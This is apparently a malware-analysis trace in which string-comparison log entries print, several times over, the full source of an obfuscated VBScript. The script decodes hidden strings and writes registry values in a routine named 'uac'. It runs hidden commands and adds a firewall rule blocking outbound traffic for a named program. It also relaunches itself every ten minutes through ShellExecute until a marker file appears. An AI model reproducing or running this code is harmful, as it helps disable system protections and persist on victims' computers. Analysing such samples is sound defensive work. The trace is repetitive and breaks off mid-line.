bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.277] wcsncmp (_String1=" Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.277] wcsncmp (_String1="Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.277] wcsncmp (_String1="rror Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.277] wcsncmp (_String1="ror Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 